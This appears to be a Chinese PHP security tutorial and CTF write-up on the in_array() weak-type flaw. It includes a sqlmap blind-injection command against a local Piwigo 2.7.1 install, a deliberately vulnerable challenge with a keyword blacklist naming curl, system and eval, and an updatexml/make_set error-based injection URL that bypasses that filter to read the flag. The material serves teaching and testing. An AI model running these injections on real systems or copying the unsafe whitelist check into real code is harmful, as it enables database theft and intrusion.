①in_array函数缺陷
代码实例:
这是文件上传检测的代码,问题出在12行,由于in_array没有设置第三个参数,导致攻击者可以构造参数名才绕过,例如5shell.php,都可以绕过,只要是在1-24中的数字(因为whitelist是1-24),因为whitelist是数字型,所以shell.php会自动去掉只剩5,发生强制类型转换
看看PHP手册对 in_array() 函数的定义。
in_array :(PHP 4, PHP 5, PHP 7)
功能 :检查数组中是否存在某个值
定义 :
bool in_array ( mixed $needle , array $haystack [, bool $strict = FALSE ] )
在 $haystack 中搜索 $needle ,如果第三个参数 $strict 的值为 TRUE ,则 in_array() 函数会进行强检查,检查 $needle 的类型是否和 $haystack 中的相同。如果找到 $haystack ,则返回 TRUE,否则返回 FALSE。
实例分析:
piwigo-2.7.1代码审计
安装版本mysql<=5.6 否则测试时候各种报错
picture.php文件传参action 使用switch函数进行判断
picture.php文件调用了include/functions_rate.inc.php,并且进行rate传参
跟入进去发现有in_array函数
$conf['rate_items'] 存在于 config_default.inc.php
利用弱类型比较,即可过掉验证
往下寻找发现这段代码传参传入了$rate ,于是可以用sql时间盲注
利用sqlmap进行注入
sqlmap.py -u "http://127.0.0.1/1/picture.php?/1/&action=rate" --data "rate=1" --dbs --batch
题目练习
//index.php
<?php
include 'config.php';
$conn = new mysqli($servername, $username, $password, $dbname);
if ($conn->connect_error) {
die("连接失败: ");
}
$sql = "SELECT COUNT(*) FROM users";
$whitelist = array();
$result = $conn->query($sql);
if($result->num_rows > 0){
$row = $result->fetch_assoc();
$whitelist = range(1, $row['COUNT(*)']);
}
$id = stop_hack($_GET['id']);
$sql = "SELECT * FROM users WHERE id=$id";
if (!in_array($id, $whitelist)) {
die("id $id is not in whitelist.");
}
$result = $conn->query($sql);
if($result->num_rows > 0){
$row = $result->fetch_assoc();
echo "<center><table border='1'>";
foreach ($row as $key => $value) {
echo "<tr><td><center>$key</center></td><br>";
echo "<td><center>$value</center></td></tr><br>";
}
echo "</table></center>";
}
else{
die($conn->error);
}
?>
//config.php
<?php
$servername = "localhost";
$username = "fire";
$password = "fire";
$dbname = "day1";
function stop_hack($value){
$pattern = "insert|delete|or|concat|concat_ws|group_concat|join|floor|\/\*|\*|\.\.\/|\.\/|union|into|load_file|outfile|dumpfile|sub|hex|file_put_contents|fwrite|curl|system|eval";
$back_list = explode("|",$pattern);
foreach($back_list as $hack){
if(preg_match("/$hack/i", $value))
die("$hack detected!");
}
return $value;
}
?>
# 搭建CTF环境使用的sql语句
create database day1;
use day1;
create table users (
id int(6) unsigned auto_increment primary key,
name varchar(20) not null,
email varchar(30) not null,
salary int(8) unsigned not null );
INSERT INTO users VALUES(1,'Lucia','Lucia@hongri.com',3000);
INSERT INTO users VALUES(2,'Danny','Danny@hongri.com',4500);
INSERT INTO users VALUES(3,'Alina','Alina@hongri.com',2700);
INSERT INTO users VALUES(4,'Jameson','Jameson@hongri.com',10000);
INSERT INTO users VALUES(5,'Allie','Allie@hongri.com',6000);
create table flag(flag varchar(30) not null);
INSERT INTO flag VALUES('HRCTF{1n0rrY_i3_Vu1n3rab13}');
将id传入witelist查询,但是in_array没有第三个参数因此可以进行报错注入,否则不会成功
传入id之前先回进行stop_hack检测,我们跟进看看,发现concat已经被拦截了,于是用make_set函数照样可以
http://127.0.0.1/index.php?id=1 and (select updatexml(1,make_set(3,'~',(select flag from flag)),1))